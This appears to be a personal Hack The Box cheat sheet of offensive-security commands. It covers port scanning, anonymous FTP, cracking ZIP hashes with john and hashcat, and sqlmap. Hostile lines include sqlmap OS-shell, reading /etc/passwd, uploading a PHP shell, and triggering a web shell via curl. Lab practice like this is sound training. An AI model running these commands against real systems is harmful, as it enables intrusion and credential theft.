Skip to content

HTB Commands Summary

Network Scanning

nmap

What: Network port scanner and service detection tool

Common flags: 

nmap -sC -sV <IP>              # Script scan + version detection
nmap -p- <IP>                   # Scan all 65535 ports
nmap -p- --min-rate=1000 <IP>   # Fast scan with packet rate
nmap -Pn <IP>                   # Skip ping, treat host as up
nmap -sS <IP>                   # SYN stealth scan (requires sudo)
nmap -T4 <IP>                   # Timing template (0-5, faster)
nmap -oN output.txt <IP>        # Save output to file

Use case: Discover open ports and services on target before exploitation

rustscan

What: Fast port scanner written in Rust, feeds results to nmap

Install: 

cargo install rustscan

Common flags: 

rustscan -a <IP>                        # Basic scan
rustscan -a <IP> -- -sC -sV             # Pass nmap flags after --
rustscan --ulimit 5000 -a <IP>          # Increase file descriptor limit

Use case: Quick port discovery (faster than nmap alone), then detailed nmap scan

File Transfer & Access

ftp

What: File Transfer Protocol client for accessing FTP servers

Usage: 

ftp <IP>                        # Connect to FTP server
ftp <IP> <PORT>                 # Connect with custom port

Inside FTP: 

ls                              # List files
get <file>                      # Download file
put <file>                      # Upload file
binary                          # Set binary mode (for executables)
ascii                           # Set text mode
mget *                          # Download all files
cd <dir>                        # Change directory
bye                             # Exit

Use case: Download files from vulnerable FTP servers, often anonymous login allowed

Password Cracking

zip2john

What: Extract hash from password-protected ZIP files for cracking

Usage: 

zip2john file.zip > hash.txt    # Extract hash to file

Use case: Prepare ZIP file for password cracking with john

john (John the Ripper)

What: Password cracking tool (CPU-based)

Common usage: 

john hash.txt                                   # Auto-detect and crack
john --wordlist=rockyou.txt hash.txt            # Dictionary attack
john --format=raw-MD5 hash.txt                  # Specify hash format
john --show hash.txt                            # Show cracked passwords

Common formats: - raw-MD5 - MD5 hashes - raw-SHA256 - SHA256 hashes - bcrypt - bcrypt hashes

Location after compiling: 

~/john/run/john                 # Compiled version
~/john/run/zip2john            # Helper scripts

Use case: Crack weak passwords from extracted hashes

hashcat

What: Advanced password cracking tool (GPU-accelerated)

Common flags: 

hashcat -m 0 hash.txt wordlist.txt              # MD5 cracking
hashcat -m 1400 hash.txt wordlist.txt           # SHA256
hashcat -m 0 hash.txt wordlist.txt --show       # Show cracked
hashcat -I                                      # List devices (GPU/CPU)

Hash modes: - -m 0 - MD5 - -m 100 - SHA1 - -m 1400 - SHA256 - -m 1000 - NTLM - -m 17200 - PKZIP

Use case: Fast GPU-based password cracking (10-100x faster than john)

SQL Injection

sqlmap

What: Automated SQL injection and database takeover tool

Common flags: 

sqlmap -u "http://IP/page.php?id=1"                     # Test URL
sqlmap -u "URL" --cookie="PHPSESSID=xyz" --batch        # With cookie, non-interactive
sqlmap -u "URL" --dbs                                   # List databases
sqlmap -u "URL" -D dbname --tables                      # List tables
sqlmap -u "URL" -D dbname -T users --dump               # Dump table
sqlmap -u "URL" --os-shell                              # Get OS shell
sqlmap -u "URL" --file-read="/etc/passwd"               # Read files
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/html/s.php"  # Upload file

Useful flags: - --batch - Non-interactive mode - --dbs - Enumerate databases - --tables - List tables - --dump - Extract data - --os-shell - Interactive shell (unstable) - --file-read - Read files from server - --file-write / --file-dest - Upload files

Downloaded files location: 

~/.local/share/sqlmap/output/<IP>/files/

Use case: Exploit SQL injection to extract data, read files, or get shell access

Data Extraction & Analysis

curl

What: Transfer data from/to servers, make HTTP requests

Common usage: 

curl -i <URL>                                   # Include headers
curl -X POST <URL> -d "user=admin&pass=123"     # POST request
curl -i -X POST <URL> -d "data"                 # POST with headers (get cookies)
curl "http://IP/shell.php?cmd=whoami"           # Execute web shell command

Use case: Test web services, extract cookies, trigger web shells

grep

What: Search text patterns in files

Common usage: 

grep "password" file.txt        # Search for pattern
grep -i "password" file.txt     # Case insensitive
grep -r "password" /path/       # Recursive search
cat file.php | grep password    # Search in pipe output

Use case: Find credentials, connection strings in source code

cat

What: Display file contents

Common usage: 

cat file.txt                    # Display file
cat file.txt | grep pattern     # Pipe to grep

Use case: Read config files, extracted data, credentials

wc

What: Count lines, words, characters

Common usage: 

wc -l file.txt                  # Count lines

Use case: Verify wordlist size, check data extraction

File Operations

unzip

What: Extract ZIP archives

Common usage: 

unzip file.zip                  # Extract all
unzip -l file.zip               # List contents

Use case: Extract downloaded archives from FTP/HTTP

chmod

What: Change file permissions

Common usage: 

chmod +x script.sh              # Make executable
chmod 755 file                  # rwxr-xr-x

Use case: Make downloaded scripts/tools executable

find

What: Search for files and directories

Common usage: 

find / -name "*.txt" 2>/dev/null            # Find files by name
find / -name "*flag*" 2>/dev/null           # Search for flags
find / -perm -4000 2>/dev/null              # Find SUID binaries (privesc)

Use case: Locate flags, find privilege escalation vectors

Environment & Workflow

export

What: Set environment variables

Common usage: 

export IP=10.129.23.11          # Set target IP variable
echo $IP                        # Use variable

Use case: Store target IP for quick reference in commands

which

What: Locate command binary path

Common usage: 

which john                      # Find john binary location
which zip2john                  # Check if tool installed

Use case: Verify tool installation, find binary paths

Git (For Tool Management)

git clone

What: Clone repository

Common usage: 

git clone https://github.com/openwall/john.git
git clone <repo_url>

Use case: Download tools from GitHub (john, exploits, scripts)

git submodule

What: Initialize submodules in repo

Common usage: 

git submodule update --init --recursive

Use case: Required for some tools like john that use submodules

Compilation

make

What: Build software from source

Common flags: 

make                            # Build with defaults
make clean                      # Clean build artifacts
make -j4                        # Use 4 cores
make -j$(nproc)                 # Use all CPU cores
sudo make install               # Install compiled binaries

Use case: Compile john the ripper, custom exploits, tools

cmake

What: Cross-platform build system generator

Common usage: 

cmake ..                        # Generate build files from parent dir
cmake . && make                 # Configure and build

Use case: Build complex projects that require cmake (input-leap, some exploits)

Apt Package Management

apt install

What: Install packages on Debian/Ubuntu

Common usage: 

sudo apt install <package>              # Install package
sudo apt update                         # Update package lists
sudo apt upgrade                        # Upgrade installed packages
sudo apt remove <package>               # Remove package

Installed tools: - john - Password cracker - hashcat - GPU password cracker - sqlmap - SQL injection tool - nmap - Port scanner - ftp - FTP client - git - Version control - build-essential - Compilation tools

Wordlists

rockyou.txt

What: 14 million password wordlist (most common for HTB)

Download: 

curl -L -o ~/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Location after download: 

~/rockyou.txt

Use case: Primary wordlist for password cracking on HTB

SecLists

What: Comprehensive security testing wordlists and payloads

Download: 

git clone https://github.com/danielmiessler/SecLists.git ~/SecLists

Use case: Additional wordlists, directory brute force lists, fuzzing payloads

HTB Workflow Example

# 1. Set target IP
export IP=10.129.23.11

# 2. Quick port scan
rustscan -a $IP -- -sC -sV

# 3. Access FTP if open
ftp $IP
# Login: anonymous / <blank>
# get files

# 4. Extract protected ZIP
zip2john backup.zip > hash.txt

# 5. Crack password
~/john/run/john --wordlist=~/rockyou.txt hash.txt

# 6. Show cracked password
~/john/run/john --show hash.txt

# 7. Unzip with password
unzip backup.zip

# 8. Search for credentials
cat index.php | grep password

# 9. Test SQLi with sqlmap
curl -i -X POST http://$IP/index.php -d "username=admin&password=pass"
sqlmap -u "http://$IP/dashboard.php?search=test" --cookie="PHPSESSID=abc123" --os-shell

# 10. Exploit and get flags

Quick Reference

Recon: 

export IP=<target>
rustscan -a $IP -- -sC -sV

File download: 

ftp $IP
wget http://$IP/file
curl -O http://$IP/file

Password cracking: 

zip2john file.zip > hash.txt
~/john/run/john --wordlist=~/rockyou.txt hash.txt

SQL injection: 

sqlmap -u "http://$IP/page.php?id=1" --dbs --batch
sqlmap -u "..." --file-read="/etc/passwd"

Search files: 

cat file.php | grep password
grep -r "password" /var/www/
find / -name "*flag*" 2>/dev/null

HTB Commands Reference - January 2026